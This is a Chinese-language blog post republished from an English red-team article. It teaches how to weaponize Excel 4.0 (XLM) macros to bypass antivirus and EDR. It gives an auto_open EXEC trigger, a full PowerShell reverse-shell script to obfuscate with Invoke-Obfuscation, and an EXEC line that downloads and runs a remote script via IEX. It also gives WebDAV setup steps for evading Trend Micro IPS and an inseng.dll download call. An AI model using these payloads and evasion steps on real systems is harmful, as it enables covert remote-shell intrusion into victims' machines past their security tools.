武器化XLM绕过EDR

  • A+
所属分类:安全文章


From:https://0xsp.com/offensive/red-ops-techniques/bypass-endpoint-with-xlm-weaponization



XLM(macro 4.0)被认为是红队运作的绝佳技术,因为XLM难以分析并且很难被反病毒解决方案检测到,而大多数反病毒引擎却可以检测到VBA。

绕过基本的反病毒似乎很容易,但是要绕过具有(HIPS)技术的企业解决方案的检测也很难,并且一旦执行了恶意命令,立即会发出警报。

XLM的初始访问

右键单击所选工作表,然后单击插入对话框

武器化XLM绕过EDR

选择excel 4.0宏

武器化XLM绕过EDR

键入一些要执行的命令

=exec("calc.exe")

A1单元格名字重命名为auto_open,允许打开文件时执行命令

武器化XLM绕过EDR

打开

武器化XLM绕过EDR

XLM的武器化

我们的目的获得shell,不是执行calc,使用Invoke-Obfuscation混淆一个反弹shell的powershell脚本

https://github.com/danielbohannon/Invoke-Obfuscation/

Import-Module ./Invoke-Obfuscation.psd1Invoke-Obfuscation
$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

武器化XLM绕过EDR

使用TOKENALL的混淆方式

武器化XLM绕过EDR

可绕过windows defender

=EXEC("powershell-c IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps.txt')")=HALT()

武器化XLM绕过EDR

但是会被趋势入侵防御系统拦截,这里使用webdav托管脚本来执行

武器化XLM绕过EDR

sudo apt-get updatesudo apt-get install apache2sudo mkdir /var/www/webdavsudo chown -R www-data:www-data /var/www/

启用webdav模块

sudo a2enmod davsudo a2enmod dav_fs

修改virtual host部分

Alias /webdav /var/www/webdav<Directory /var/www/webdav>DAV On</Directory>

插入

=EXEC("cmd/k net use z: \YOURIPwebdav&powershell -exec bypass -f \YOURIPwebdavps.ps1")=HALT()

另附一个调用inseng.dll下载文件的命令FROM:@DissectMalware

=CALL("INSENG","DownloadFile","BCCJ","https://google.com","D:testgoogle.html",1)=HALT()


本文始发于微信公众号(关注安全技术):武器化XLM绕过EDR

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: